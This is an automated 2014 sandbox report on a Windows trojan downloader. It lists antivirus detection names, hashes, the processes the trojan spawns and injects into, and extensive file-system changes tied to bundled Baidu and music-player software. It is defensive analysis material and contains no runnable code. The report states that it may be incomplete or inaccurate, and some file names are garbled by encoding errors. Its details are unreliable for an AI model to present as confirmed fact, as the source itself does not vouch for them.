Trojan.GenericKD.1780278_fb4f8f36fd

by malwarelabrobot on August 18th, 2014 in Malware Descriptions.

Trojan.Win32.Agent.ahbpp (Kaspersky), Trojan.GenericKD.1780278 (B) (Emsisoft), Trojan.GenericKD.1780278 (AdAware), Trojan-Downloader.Win32.Karagany.1.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.BHO.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, Trojan.Win32.Swrort.3.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, VirTool

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: fb4f8f36fd1264269585743f34446bf2
SHA1: 2d346a8822cc01d2a95fa722bef226fca6c9661b
SHA256: a107d4e9f2af459bf1c1ee9146b3a5e2ce91bcc2ed78fc830cf279ba9a6ecbb6
SSDeep: 49152:Y7sthm3v/ms sKz34I07sPfZ2bzRYFBpNCUCPBG3Us:us833ms HcPsHwRYFBrgwks
Size: 1872747 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Eilio.-.Installer
Created at: 2009-06-19 00:33:27
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

wwwww_3340.exe:3720
vcredist_x86.exe:2720
netsh.exe:3112
bddownloader.exe:2984
guagua_77150006814.exe:1016
sc.exe:1336
sc.exe:644
BDDownloader.exe:2084
BDDownloader.exe:2804
MsiExec.exe:3196
candid.exe:1548
pczh_107_306.exe:828
baiduanTray.exe:2772
spkjrjp_30279.exe:1632
yymusic05.exe:2308
regsvr32.exe:3184
BDALeakfixer.exe:3640
BaiduAn.exe:3516
BaiduAn.exe:3208
BaiduAnSvc.exe:3884
BaiduAnSvc.exe:3732
oovmdw_70745.exe:444
BDASWAcc.exe:316

The Trojan injects its code into the following process(es):

bddownloader.exe:3936
bddownloader.exe:2820
%original file name%.exe:188
YFMSever.exe:2388
Ainqngz5.2.exe:1136
services.exe:756

Mutexes

The following mutexes were created/opened:

ShimCacheMutex

File activity

The process wwwww_3340.exe:3720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\yyfm0529.lnk (840 bytes)
%Program Files%\yyfm0529\2014081705\Data\version.ini (32 bytes)
%Program Files%\yyfm0529\2014081705\swresample-0.dll (3312 bytes)
%Program Files%\yyfm0529\2014081705\Data\user2.ini (40 bytes)
%Program Files%\yyfm0529\2014081705\yymusic05.exe (63950 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\Ã‚Â¹Ãƒâ„¢Ã‚Â·Ã‚Â½Ãƒâ€“ÃƒÂ·Ãƒâ€™Ã‚Â³.lnk (334 bytes)
%Program Files%\yyfm0529\2014081705\audio.dll (3616 bytes)
%Program Files%\yyfm0529\2014081705\pthreadGC2.dll (3616 bytes)
%Program Files%\yyfm0529\2014081705\avutil-52.dll (5520 bytes)
%Program Files%\yyfm0529\2014081705\Data\client.ini (36 bytes)
%Program Files%\yyfm0529\2014081705\favorfm.xml (440 bytes)
%Program Files%\yyfm0529\2014081705\DuiLib.dll (16288 bytes)
%Program Files%\yyfm0529\2014081705\Data\setup.ini (110 bytes)
%Program Files%\yyfm0529\2014081705\Data\dh.ini (56 bytes)
%Program Files%\yyfm0529\2014081705\channels.xml (784 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\Ãƒâ€¦ÃƒÂ¤Ãƒâ€“ÃƒÆ’Ã‚Â¹Ã‚Â¤Ã‚Â¾ÃƒÅ¸\ÃƒÂÃ‚Â¶Ãƒâ€ÃƒËœyyfm0529.lnk (830 bytes)
%Program Files%\yyfm0529\2014081705\libav.dll (6360 bytes)
%Program Files%\yyfm0529\2014081705\Unins.exe (9608 bytes)
%Program Files%\yyfm0529\2014081705\YFMSever.exe (23936 bytes)
%Program Files%\yyfm0529\2014081705\avcore.dll (2392 bytes)
%Program Files%\yyfm0529\2014081705\avcodec-54.dll (23936 bytes)
%Program Files%\yyfm0529\2014081705\source.dll (6584 bytes)
%Program Files%\yyfm0529\2014081705\SysConfig.ini (256 bytes)
%Program Files%\yyfm0529\2014081705\avformat-54.dll (12536 bytes)

The process vcredist_x86.exe:2720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredis1.cab (6255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredist.msi (42423 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredis1.cab (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredist.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\crt.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP (0 bytes)

The process bddownloader.exe:2820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMWrench.sys.tmp.bdl (6441 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\dnw.xml.tmp.bdl (241 bytes)

The process guagua_77150006814.exe:1016 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\desktop.ini (67 bytes)

The process %original file name%.exe:188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\NSISdl.dll (14 bytes)
%Program Files%\updatr\tj.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (57025 bytes)
%Program Files%\updatr\oovmdw_70745.exe (51840 bytes)
%Program Files%\updatr\uboskin\config.ini (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\pczh_107_306.exe (57056 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\adwoca_00005.exe (4626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\wwwww_3340.exe (413400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spkjrjp_30279.exe (230878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\guagua_77150006814.exe (106373 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\sha (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\tqrlsimp27_dubo_001.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (0 bytes)

The process YFMSever.exe:2388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\cb16fabc\DMSet.Xml (675 bytes)

The process BDDownloader.exe:2084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Baidu\BDDownload\107\bddownloader.exe (9605 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\dl.dll (14988 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\bdcomproxy.dll (601 bytes)

The process BDDownloader.exe:2804 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst12.tmp (86466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\dl.dll (65930 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\7z.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi13.tmp\System.dll (784 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi13.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd11.tmp (0 bytes)

The process pczh_107_306.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2\ÃƒÂÃ‚Â¶Ãƒâ€ÃƒËœ.lnk (715 bytes)
%Program Files%\ainqngz5.2\candid.exe (5520 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2.lnk (720 bytes)
%Program Files%\ainqngz5.2\uninstall.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (19409 bytes)
%Program Files%\ainqngz5.2\Ainqngz5.2.exe (4992 bytes)
%Program Files%\ainqngz5.2\schedule.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsA.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsB.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2.lnk (708 bytes)
%Documents and Settings%\%current user%\Templates\172014852040460\YYM_955WD30.gif (1134 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\Base64.dll (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsB.tmp (0 bytes)
%Documents and Settings%\%current user%\Templates\172014852040460 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso7.tmp (0 bytes)
%Documents and Settings%\%current user%\Templates\172014852040460\YYM_955WD30.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\Base64.dll (0 bytes)

The process spkjrjp_30279.exe:1632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\hu.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDLogicUtils.dll (30968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMSkin.dll (38495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh19.tmp (166951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMDownload.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMNetGetInfo.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\tmpt5zprs.dll (95827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\res\onlineWnd.zip (6360 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp (0 bytes)

The process yymusic05.exe:2308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\a[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\stj[1].ashx (3 bytes)
%Program Files%\yyfm0529\2014081705\Data\server.ini (1 bytes)
%Program Files%\yyfm0529\2014081705\SysConfig.ini (440 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\tj[1].ashx (3 bytes)
%Program Files%\yyfm0529\2014081705\Data\user2.ini (402 bytes)
%Program Files%\yyfm0529\2014081705\Data\client.ini (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\ver[1].txt (36 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\stj[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\a[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\tj[1].ashx (0 bytes)

The process BaiduAnSvc.exe:3884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\Cab16.tmp (54 bytes)
%System%\config\SYSTEM.LOG (7714 bytes)
%System%\config\software (95028 bytes)
%System%\config\SOFTWARE.LOG (76196 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\white_list.db (145 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%WinDir%\Temp\Cab14.tmp (54 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\white_list.db-journal (512 bytes)
%WinDir%\Temp\Tar17.tmp (2712 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%System%\drivers\BDEnhanceBoost.sys (48 bytes)
%System%\config\system (4478 bytes)
%System%\drivers\BDMWrench.sys (1346 bytes)
C:\$Directory (576 bytes)
%WinDir%\Temp\Tar15.tmp (2712 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (0 bytes)
%System%\drivers\BDMWrench.sys (0 bytes)
%WinDir%\Temp\Tar17.tmp (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMWrench.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\white_list.db-journal (0 bytes)
%WinDir%\Temp\Cab14.tmp (0 bytes)
%WinDir%\Temp\Cab16.tmp (0 bytes)
%WinDir%\Temp\Tar15.tmp (0 bytes)

The process oovmdw_70745.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\BDMNetMonSusPlugin.dll (3721 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDSWShellExt.dll (1720 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\BDMSOAccServicePlugin.dll (1859 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMRepBase.dll (3897 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\FileMon.dll (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\KVCommonRes.rdb (109 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SysFixer.rdb (87 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSWNestCore.dll (6428 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTray.rdb (20 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«.lnk (823 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Patch\publish.db (32763 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\vcredist_x86.exe (17629 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMSysFixerPlugin.dll (5442 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (40 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMNetGetInfo.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMSkin.dll (36698 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMNetMon_XP_x86.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\ad.dll (6379 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\scan_mgr_config.dat (2 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnBugRpt.exe (6437 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDNetMisc.dll (67 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDLogicUtils.dll (3811 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMStringUtils.dll (66 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnUpdate.exe (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SysOptDict.dat (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\SusPluginContainerConfig.xml (605 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_property.dat (267 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDMNetMon_WIN7_x86.sys (94 bytes)
%System%\drivers\BDMNetMon.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOHomePageCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMUpdate.rdb (1630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMDownload.dll (5520 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOSilentCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDArKit.sys (91 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SysAccLiveStrategy.dat (93 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\app.ico (1623 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSusPlugin.dll (3745 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDKVLogs.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOGarbageCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_acc.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\PluginSetup.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\SysRepLib.dat (22 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\NetService.ini (590 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOPluginCleanerConfig.dat (442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMSOManagerPlugins\BDMSOAcceleratorPlugin.dll (6424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (111370 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixer.dll (267 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BDMSOCleaner\SOGarbageConfig.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\TrustAndIso.dll (262 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\LocalPluginInfo.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMCoolyPlugins\BDMSOAccCoolyPlugin.dll (1834 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_1_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SOTurbo.rdb (18 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCScriptBind.dll (3815 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\CommonRes.rdb (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\bd0002.sys (1281 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerPreScan.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\PluginManager\PluginConfig.db (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\f2d00606824cd42a1c03eb9caa15e29f.bdt (631 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnSvc.exe (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTips.rdb (183 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMMsg.dll (49 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_2_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (2132 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\BDMSWManagerFrame.dll (3725 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAn.exe (1683 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\{F5E93978-539C-476B-9A7B-B6C32025A557}.png (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMScriptVM.dll (213 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\hips.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMSetting.rdb (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\dl.dll (65930 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDDownloader.exe (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\snczjmr.dll.bdl (386923 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDASWAcc.exe (46 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMTinyXml.dll (181 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86 (4 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDLogicUtils.dll.bdl (46921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMNet.dll.bdl (32387 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccStrategyMgr.dll (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\res\onlineWnd.zip (14184 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMMainFrame.dll (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SORegCleanerConfig.dat (900 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SWManager.rdb (1812 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_minute_speed.png (15 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\bd0001.sys (70 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSkin.dll (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\33f59beac1c942dd19f41a7fd30f3f9b.bdt (647 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\tmpjnmhqw.dll (27504 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\snczjmr.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\68905108990c088c31aead3b6d1651be.bdt (519 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SYSCleaner.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SORegCleanerScript.dat (14 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (5595 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMUpdate.dll (3729 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOTraceConfig.xml (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\a644398e96b2e49d735a01f51e447930.bdt (3 bytes)
%System%\drivers\bd0002.sys (1281 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\uninst.exe (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMCommon.dll (1609 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDCooly.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\BDMConnect.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDASoftmgr.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\PluginManager.dll (6359 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerCheckItem.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDAFileHelper.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMWrench.sys (833 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SiteInspection.rdb (1868 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\kav_compatible.dat (25 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bg_tips_speed_win8.png (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_class_filter.db (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOGarbageConfig.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\bd0001.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\bd0002.sys (218 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SysAccelerator.rdb (1742 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDKitUtils.dll (62 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_repairproperty.dat (2 bytes)
